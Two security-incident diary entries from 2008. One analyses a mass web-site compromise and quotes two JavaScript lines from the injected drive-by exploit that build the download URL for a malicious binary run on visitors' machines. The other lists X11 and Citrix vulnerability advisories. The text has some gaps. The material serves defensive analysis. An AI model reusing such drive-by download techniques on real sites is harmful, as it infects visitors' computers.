Last Updated: 2008-01-18 09:27:53 UTC
by Bojan Zdrnja (Version: 1)
Couple of days ago Mari posted a diary (http://isc.sans.org/diary.html?storyid=3834) about mass web infections; other sources like the Register reported about the same thing.
I’ve been playing with one compromised web site today and was trying to figure out what the infection vector is.
While subsequent visits will not:
var MU = "http://" +document.location.hostname + "/" + arg;
var MU2 = "\"" + MU + "\"";
The MU2 variable is then inserted in the exploit code (which is split using the escape() calls). This makes the exploit code “universal” – it works on every compromised server and the server side script only has to set the arg parameter (the name of the final binary that gets pulled and executed on a vulnerable client) as the hostname will be set automatically by the browser. The rest is simple (and has been written about by others so I won’t spend time on that) – the script tries to exploit multiple vulnerabilities and if successful will result in the binary executed on the system.
Another interesting thing is that the binary seems to be repacked on the compromised system as well. I pulled couple of binaries from different clients and every time received a different sample (and AV detection was pretty poor).
Two main questions are still not answered here: how do those servers get initially compromised and what kind of server side application do the bad guys install?
So a call for samples/logs/packets – if you have access to one of the compromised servers we would appreciate any information that can help resolving this.
Last Updated: 2008-01-18 08:22:17 UTC
by Stephen Hall (Version: 1)
Remote vulnerabilities for two graphical user environments have been announced, four for an environment which has been around since the beginning of distributed computing, and one with a newer contender.
iDefense have released four vulnerabilities for various vendor implementations of the popular X11 implementations.
Multiple Vendor X Server XInput Extension Multiple Memory Corruption Vulnerabilities (CVE-2007-6427)
Multiple Vendor X Server TOG-CUP Extension Information Disclosure Vulnerability (CVE-2007-6428)
Multiple Vendor X Server EVI and MIT-SHM Extensions Integer Overflow Vulnerabilities (CVE-2007-6429)
Multiple Vendor X Server XFree86-Misc Extension Invalid Array Index Vulnerability (CVE-2007-5760)
ZDI have released the following remotely exploitable vulnerability for the following products:
- Metaframe Presentation Server 3.0
- Presentation Server 4.0, 4.5
- Access Essentials 1.0, 1.5, 2.0
- Desktop Server 1.0
This vulnerability does not require previous authentication for Citrix.
Citrix Presentation Server IMA Service Heap Overflow Vulnerability (ZDI-08-002)